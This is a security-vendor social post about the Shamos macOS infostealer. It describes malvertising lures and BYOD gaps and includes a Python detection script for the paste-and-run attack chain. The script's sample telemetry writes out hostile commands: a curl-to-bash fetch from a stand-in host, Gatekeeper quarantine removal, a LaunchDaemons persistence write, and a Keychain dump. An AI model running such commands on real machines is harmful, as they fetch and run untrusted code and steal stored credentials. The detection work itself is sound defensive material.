Shamos macOS Infostealer: Malvertising Lures, BYOD Gaps, and Sector Expansion

Mac users, stop pasting Terminal “fixes” you found above the fold on Google.

SHAMOS—an AMOS offshoot from COOKIE SPIDER—is eating Keychains via malvertising and fake “Apple help” sites. CrowdStrike logged 300+ delivery attempts (June–Aug). The play: a one-liner that kneecaps Gatekeeper, pulls a Bash installer, and goes shopping for creds. BYOD/unmanaged Macs = soft underbelly.

3 fast wins:

• Enforce Gatekeeper/XProtect via MDM; block unsigned binaries/scripts.

• Load IOCs; watch LaunchDaemons writes, Keychain access, and search-ad lures.

• Train users: “Never paste a fix from a website,” period.
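To make the second win concrete, here is an added example (not code from the AlphaHunt post or from CrowdStrike) that scores endpoint process telemetry for the paste-and-run chain described above: Gatekeeper tampering, a curl-piped-to-bash installer, a LaunchDaemons write, and Keychain access. The log format, user names, paths and the specific command patterns are assumptions, and the sample lines are constructed.

```python
import re

# Stage patterns for the Shamos-style chain. The commands matched here are
# assumptions based on standard macOS admin tooling, not IOCs from the post.
STAGES = {
    "gatekeeper_tamper": re.compile(
        r"\bspctl\b.*--(master|global)-disable"
        r"|\bxattr\b.*(-c\b|-d\s+com\.apple\.quarantine)"),
    "remote_script_exec": re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "launchdaemon_write": re.compile(r"/Library/Launch(Daemons|Agents)/\S+\.plist"),
    "keychain_access": re.compile(
        r"Library/Keychains/"
        r"|\bsecurity\s+(dump-keychain|find-(generic|internet)-password)"),
}

# Constructed sample telemetry, one process start per line: user|parent|command.
SAMPLE_EVENTS = [
    "alice|Terminal|xattr -d com.apple.quarantine /tmp/fix.sh",
    "alice|Terminal|curl -fsSL http://lure.example/install.sh | bash",
    "alice|bash|cp /tmp/agent.plist /Library/LaunchDaemons/com.example.helper.plist",
    "alice|bash|security dump-keychain -d /Users/alice/Library/Keychains/login.keychain-db",
    "bob|Terminal|brew install wget",
    "bob|Terminal|ls -la /Users/bob/Library/Keychains/",
]


def detect_chain(events):
    """Return {user: {stage: [matching commands]}} for every matched stage."""
    hits = {}
    for line in events:
        user, _parent, cmd = line.split("|", 2)
        for stage, pattern in STAGES.items():
            if pattern.search(cmd):
                hits.setdefault(user, {}).setdefault(stage, []).append(cmd)
    return hits


def verdict(stage_hits):
    """Severity for one user: Gatekeeper tamper plus a remote installer is the
    full paste-and-run play; a lone Keychain directory listing is just noise."""
    stages = set(stage_hits)
    if {"gatekeeper_tamper", "remote_script_exec"} <= stages:
        return "critical"
    if len(stages) >= 2:
        return "high"
    if stages & {"gatekeeper_tamper", "remote_script_exec"}:
        return "medium"
    return "low"


if __name__ == "__main__":
    for user, stage_hits in detect_chain(SAMPLE_EVENTS).items():
        print(user, verdict(stage_hits), sorted(stage_hits))
```

Wire the same stage patterns into your EDR or MDM query language; the scoring matters more than the exact regexes, since a single stage on its own is common on admin Macs.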

If a Mac flips protections off, would your BYOD gate catch it—or stroll right in? 🍪🕷️🍎

Read the breakdown & subscribe: https://blog.alphahunt.io/shamos-macos-infostealer-malvertising-lures-byod-gaps-and-sector-expansion

#AlphaHunt #CyberSecurity #macOS #Infostealer #SOC

Did you learn something new?